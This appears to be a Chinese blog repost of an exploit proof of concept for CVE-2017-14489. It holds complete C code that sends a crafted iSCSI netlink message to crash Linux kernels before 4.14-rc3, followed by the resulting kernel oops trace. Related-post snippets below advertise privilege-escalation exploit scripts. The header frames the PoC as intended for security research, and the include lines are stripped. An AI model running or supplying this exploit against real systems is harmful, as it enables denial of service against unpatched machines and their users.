linux内核漏洞 安全客,CVE-2017-14489

最新推荐文章于 2022-06-05 20:17:46 发布
最新推荐文章于 2022-06-05 20:17:46 发布
阅读量174 收藏
点赞数
文章标签: linux内核漏洞 安全客

# Exploit Title: Linux Kernel<4.14.rc3 Local Denial of Service

# Date: 2017-Oct-02

# Exploit Author: Wang Chenyu (Nanyang Technological University)

# Version:Linux kernel 4-14-rc1

# Tested on:Ubuntu 16.04 desktop amd64

# CVE : CVE-2017-14489

# CVE description: This CVE is assigned to Wang Chunyu (Red Hat) and

discovered by Syzkaller. Provided for legal security research and testing

purposes ONLY.

In this POC, skb_shinfo(SKB)->nr_frags was overwritten by ev->iferror = err

(0xff) in the condition where nlh->nlmsg_len==0x10 and skb->len >

nlh->nlmsg_len.

POC:

#include

#include

#include

#include

#include

#define NETLINK_USER 31

#define MAX_PAYLOAD 1024 /* maximum payload size*/

struct sockaddr_nl src_addr, dest_addr;

struct nlmsghdr *nlh = NULL;

struct iovec iov;

int sock_fd;

struct msghdr msg;

int main()

{

sock_fd=socket(PF_NETLINK, SOCK_RAW, NETLINK_ISCSI);

if(sock_fd<0)

return -1;

memset(&src_addr, 0, sizeof(src_addr));

src_addr.nl_family = AF_NETLINK;

src_addr.nl_pid = getpid(); /* self pid */

bind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr));

memset(&dest_addr, 0, sizeof(dest_addr));

memset(&dest_addr, 0, sizeof(dest_addr));

dest_addr.nl_family = AF_NETLINK;

dest_addr.nl_pid = 0; /* For Linux Kernel */

dest_addr.nl_groups = 0; /* unicast */

nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));

memset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));

nlh->nlmsg_len = 0xac;

nlh->nlmsg_pid = getpid();

nlh->nlmsg_flags = 0;

strcpy(NLMSG_DATA(nlh), "ABCDEFGHabcdefghABCDEFGHabcdef

ghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHab

cdefghAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDD\x10");

iov.iov_base = (void *)nlh;

iov.iov_len = 0xc0;

msg.msg_name = (void *)&dest_addr;

msg.msg_namelen = sizeof(dest_addr);

msg.msg_iov = &iov;

msg.msg_iovlen = 1;

printf("Sending message to kernel\n");

sendmsg(sock_fd,&msg,0);

printf("Waiting for message from kernel\n");

/* Read message from kernel */

recvmsg(sock_fd, &msg, 0);

printf("Received message payload: %s\n", (char *)NLMSG_DATA(nlh));

close(sock_fd);

}

Crash info:

[ 17.880629] BUG: unable to handle kernel NULL pointer dereference at

0000000000000028

[ 17.881586] IP: skb_release_data+0x77/0x110

[ 17.882093] PGD 7b02a067 P4D 7b02a067 PUD 7b02b067 PMD 0

[ 17.882743] Oops: 0002 [#1] SMP

[ 17.883123] Modules linked in:

[ 17.883493] CPU: 1 PID: 2687 Comm: test02 Not tainted 4.14.0-rc1+ #1

[ 17.884251] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS

Ubuntu-1.8.2-1ubuntu1 04/01/2014

[ 17.885350] task: ffff88007c5a1900 task.stack: ffffc90000e10000

[ 17.886058] RIP: 0010:skb_release_data+0x77/0x110

[ 17.886590] RSP: 0018:ffffc90000e13c08 EFLAGS: 00010202

[ 17.887213] RAX: 000000000000000d RBX: ffff88007bd50300 RCX:

ffffffff820f96a0

[ 17.888059] RDX: 000000000000000c RSI: 0000000000000010 RDI:

000000000000000c

[ 17.888893] RBP: ffffc90000e13c20 R08: ffffffff820f9860 R09:

ffffc90000e13ad8

[ 17.889712] R10: ffffea0001ef5400 R11: ffff88007d001700 R12:

0000000000000000

[ 17.890349] R13: ffff88007be710c0 R14: 00000000000000c0 R15:

0000000000000000

[ 17.890977] FS: 00007f7614d4c700(0000) GS:ffff88007fd00000(0000)

knlGS:0000000000000000

[ 17.891592] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033

[ 17.892054] CR2: 0000000000000028 CR3: 000000007b022000 CR4:

00000000000006e0

[ 17.892629] Call Trace:

[ 17.892833] skb_release_all+0x1f/0x30

[ 17.893140] consume_skb+0x27/0x90

[ 17.893418] netlink_unicast+0x16a/0x210

[ 17.893735] netlink_sendmsg+0x2a3/0x390

[ 17.894050] sock_sendmsg+0x33/0x40

[ 17.894336] ___sys_sendmsg+0x29e/0x2b0

[ 17.894650] ? __wake_up_common_lock+0x7a/0x90

[ 17.895009] ? __wake_up+0xe/0x10

[ 17.895280] ? tty_write_unlock+0x2c/0x30

[ 17.895606] ? tty_ldisc_deref+0x11/0x20

[ 17.895925] ? n_tty_open+0xd0/0xd0

[ 17.896211] ? __vfs_write+0x23/0x130

[ 17.896512] __sys_sendmsg+0x40/0x70

[ 17.896805] ? __sys_sendmsg+0x40/0x70

[ 17.897133] SyS_sendmsg+0xd/0x20

[ 17.897408] entry_SYSCALL_64_fastpath+0x13/0x94

[ 17.897783] RIP: 0033:0x7f7614886320

[ 17.898186] RSP: 002b:00007fff6f17f9c8 EFLAGS: 00000246 ORIG_RAX:

000000000000002e

[ 17.898793] RAX: ffffffffffffffda RBX: 00007f7614b2e7a0 RCX:

00007f7614886320

[ 17.899368] RDX: 0000000000000000 RSI: 0000000000600fc0 RDI:

0000000000000003

[ 17.899943] RBP: 0000000000000053 R08: 00000000ffffffff R09:

0000000000000000

[ 17.900521] R10: 0000000000000000 R11: 0000000000000246 R12:

0000000000400b9e

[ 17.901095] R13: 00007f7614d50000 R14: 0000000000000019 R15:

0000000000400b9e

[ 17.901672] Code: 45 31 e4 41 80 7d 02 00 48 89 fb 74 32 49 63 c4 48 83

c0 03 48 c1 e0 04 49 8b 7c 05 00 48 8b 47 20 48 8d 50 ff a8 01 48 0f 45 fa

ff 4f 1c 74 7a 41 0f b6 45 02 41 83 c4 01 44 39 e0 7f ce 49

[ 17.903190] RIP: skb_release_data+0x77/0x110 RSP: ffffc90000e13c08

[ 17.903689] CR2: 0000000000000028

[ 17.903980] ---[ end trace 2f1926fbc1d32679 ]---

Reference:

[1] https://patchwork.kernel.org/patch/9923803/

[2] https://github.com/google/syzkaller

V6火箭
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux usb摄像头反复插拔出现Unable to handle kernel NULL pointer内核错误
qq_45147279的博客
06-01 909
这个是内核中的调用顺序,可能是尝试启用摄像头设备的视频流时出现问题(是由于分配 USB 带宽失败或设置 USB 接口时出现问题导致的。然后经过反复测试,最终在usb_ifnum_to_if(const struct usb_device *dev,适当的在怀疑会出现报错的地方添加一些打印信息,我个人比较喜欢使用“printk()”,很明显这个问题是由于出现访问空指针导致了内核出现崩溃。unsigned ifnum)函数上添加以下语句。查看打印信息,定位到了这个函数。
CVE-2017-11882复现
yiyiiyiy的博客
11-24 3211
CVE-2017-11882复现 前言漏洞基本信息 漏洞ID CVE-2017-11882 漏洞名称 Microsoft Office数学公式编辑器内存损坏漏洞 威胁类型 远程代码执行 漏洞类型 栈溢出,位于EQNEDT32.EXE组件中 漏洞影响版本Microsoft Office 2000 Microsoft Office 2003Microsoft Office 2007 Service
根据linux Oops定位 kernel 错误代码行
02-13 1862
经常会遇到kernel dump问题,经常会由于kernel无法处理NULL指针,导致Oops出现,Oops内容如下: [ 1023.510000] Unable to handle kernel NULL pointer dereference at virtual address 00000000 [ 1023.520000] pgd = c0004000 [ 1023.520000]
驱动开发误用指针错误:Unable to handle kernel NULL pointer dereference at virtual address
QtHalcon
10-20 5622
今天弄驱动时,出现这个问题,检查了好久,才发现问题所在地方 Unable to handle kernel NULL pointer dereference at virtual address 00000000 原因: 因为我用到了中断,在中断函数中断我调用了一全局指针P,这个指针在定义时为NULL。 由于系统子注册玩中断后会马上检验中断函数,即使当前函数还没执行完。 这就带来了一个问...
oops 消息 Unable to handle kernel NULL pointer dereference at virtual address
热门推荐
沉淀
04-07 1万+
<br /><br />大部分 bug 以解引用 NULL 指针或者使用其他不正确指针值来表现自己的. 此类 bug 通常的输出是一个 oops 消息.<br />处理器使用的任何地址几乎都是一个虚拟地址, 通过一个复杂的页表结构映射为物理地址(例外是内存管理子系统自己使用的物理地址). 当解引用一个无效的指针, 分页机制无法映射指针到一个物理地址, 处理器发出一个页错误给操作系统. 如果地址无效, 内核无法"页入"缺失的地址; 它(常常)产生一个 oops 如果在处理器处于管理模式时发生这个情况.<br
linux内核oops错误码说明,根据linux Oops定位错误代码行
weixin_32571169的博客
04-30 1134
[ 1023.510000] Unable to handle kernel NULL pointer dereference at virtual address 00000000[ 1023.520000] pgd = c0004000[ 1023.520000] [00000000] *pgd=00000000[ 1023.520000] Internal error: Oops: 17 [...
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 <= Linux kernel 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
DirtyCow提权漏洞复现(CVE-2016-5195)1
08-08
脏牛(Dirty Cow)漏洞,全称为“竞争条件写入时复制”(Copy-on-Write Race Condition),在2016年被发现,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修复前的...
cve-2019-11477--2019-06-17-1629.sh
06-27
Linux 内核TCP “SACK Panic” 远程拒绝服务漏洞-cve-2019-11477 检测脚本。
Unable to handle kernel NULL pointer dereference at virtual address 00000000问题的解决
weixin_33978044的博客
04-14 881
今天在编译好内核模块后,安装内核模块memdev.ko的时候,出现了Unable to handle kernel NULL pointer dereference at virtual address 00000000等如图所示的问题: 在百度和google找了很多答案,明显就是跟指针有关系。。。访问了空指针什么的。。。 可是...
用 Trace32 分析内核死机
Peter的专栏
06-05 1686
dmesg 初步分析 [423.400073]UnabletohandlekernelNULLpointerdereferenceatvirtualaddress00000008 [423.400075][sileadfinger_interrupt_handler505]:SIRQ19,GPIO12stateis0 [...
一个内核oops问题的分析及解决
嵌入式Linux
05-21 1188
个人简介lccz(龙城赤子),资深嵌入式开发者,爱好Linux内核相关技术。个人CSDN博:wwwyue1985。最近在调试设备时,遇到了一个偶发的开机死机问题。通过查看输出日志,发现内核报告了oops错误,如下所示(中间省略了部分日志,以......代替):Unable to handle kernel NULL pointer dereference at virt...
用trace32分析内核死机
Peter的专栏
03-02 2557
dmesg 初步分析 [423.400073]UnabletohandlekernelNULLpointerdereferenceatvirtualaddress...
嵌入式linux内核崩溃,用sysrq-trigger实现ARM Linux一键内核崩溃、一键关机、一键dump信息等...
weixin_35668158的博客
05-11 424
# cd /proc/# echo c > sysrq-trigger[ 372.703889] sysrq: SysRq : Trigger a crash[ 372.705883] Unable to handle kernel NULL pointer dereference at virtual address 00000000[ 372.707831] pgd = 9ed5c...
pause 帧导致 dpdk-16.04 rte_kni crash 问题
龙瑜的博客
04-18 355
问题描述 系统运行时,内核 crash,oops 信息如下: <1>[17934.849450] BUG: unable to handle kernel NULL pointer dereference at 0000000000000030 <1>[17934.849530] IP: [<ffffffffa009b135>] ixgbe_update_stats+0x38b/0xc7f [rte_kni] .........
linux 内核调试(1) - coredump
weixin_41028621的博客
02-19 1879
学习kernel 调试方法 1.内核转储   内核转储(coredump)保存了进程某一时刻的运行状态,它在进程发生问题时产生,此时只要有程序的可执行文件和 coredump 即可对其进行调试,了解产生 coredump 那一刻进程的状态,从而发现问题点。通常情况下coredmp包含了程序运行时的内存,寄存器状态,堆栈指针,内存管理信息等,在设置妥当的情况下,该coredump文件在程序出错时...
内核CVE-2024-1086漏洞复现脚本
最新发布
06-19
通常情况下,内核漏洞的复现脚本是非常复杂的,因为它涉及到Linux内核源代码的深入理解和可能的特定攻击向量。这些脚本可能包括以下步骤: 1. **获取源代码**:首先,你需要从Linux内核的官方git仓库或稳定版本下载...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值